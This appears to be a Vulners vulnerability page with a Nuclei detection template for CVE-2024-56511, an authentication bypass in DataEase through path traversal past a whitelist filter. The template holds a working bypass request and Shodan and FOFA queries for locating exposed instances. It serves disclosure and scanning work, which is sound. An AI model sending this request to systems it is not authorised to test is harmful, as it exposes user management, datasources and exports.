| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| The vulnerability of the io.dataease.auth.filter.TokenFilter class in the Dataease database management system allows a perpetrator to gain unauthorized access to protected information. | 20 Jan 202500:00 | – | bdu_fstec | |
| CVE-2024-56511 | 10 Jan 202515:23 | – | circl | |
| DataEase 安全漏洞 | 10 Jan 202500:00 | – | cnnvd | |
| CVE-2024-56511 | 10 Jan 202515:19 | – | cve | |
| CVE-2024-56511 DataEase has an unauthorized vulnerability | 10 Jan 202515:19 | – | cvelist | |
| EUVD-2024-53176 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-56511 | 10 Jan 202516:15 | – | nvd | |
| CVE-2024-56511 DataEase has an unauthorized vulnerability | 10 Jan 202515:19 | – | osv | |
| PT-2025-1176 · Dataease · Dataease | 10 Jan 202500:00 | – | ptsecurity | |
| CVE-2024-56511 | 23 May 202509:08 | – | redhatcve |
id: CVE-2024-56511
info:
name: DataEase < 2.10.4 - Authentication Bypass via Whitelist Path Traversal
author: ChrisJr404
severity: critical
description: |
DataEase versions up to and including 2.10.3 contain an authentication bypass in `io.dataease.auth.filter.TokenFilter`. The filter passes the raw, unnormalized request URI to `WhitelistUtils.match()`, which only checks for whitelisted prefixes such as `/geo/`, `/customGeo/`, `/map/`, `/oauth2/`, and `/websocket` without resolving `..` segments. By prepending a whitelisted prefix and traversing back into the configured `server.servlet.context-path`, an attacker bypasses the filter while Tomcat still routes the request to the genuine, protected controller. This collapses the entire `/de2api` surface (user management, datasources, dashboards, exports) into unauthenticated access.
impact: |
An unauthenticated attacker can reach every `/de2api` endpoint as if authenticated, exposing user management, datasource configuration, dashboards, and exports. Chained with CVE-2025-32966 (H2 JDBC RCE) the bypass becomes pre-auth remote code execution.
remediation: |
Upgrade to DataEase 2.10.4 or later, which normalizes the request path before whitelist matching.
reference:
- https://github.com/dataease/dataease/security/advisories/GHSA-9f69-p73j-m73x
- https://nvd.nist.gov/vuln/detail/CVE-2024-56511
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-56511
cwe-id: CWE-289
epss-score: 0.00271
epss-percentile: 0.50488
metadata:
verified: true
max-request: 1
vendor: dataease
product: dataease
shodan-query: http.title:"DataEase"
fofa-query: title="DataEase"
tags: cve,cve2024,dataease,auth-bypass,traversal
http:
- raw:
- |+
GET /geo/../de2api/datasource/types HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "\"code\":0", "mysql", "sqlServer", "oracle")'
condition: and
# digest: 4b0a00483046022100b61702cfe2125eede69bb4f128f86d537f13f1bf950e19f95c574059ea44b75a022100c9859cc499649c1e8b196765a8a6702b6a31cb559027da73bf6e407fa0c7716a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation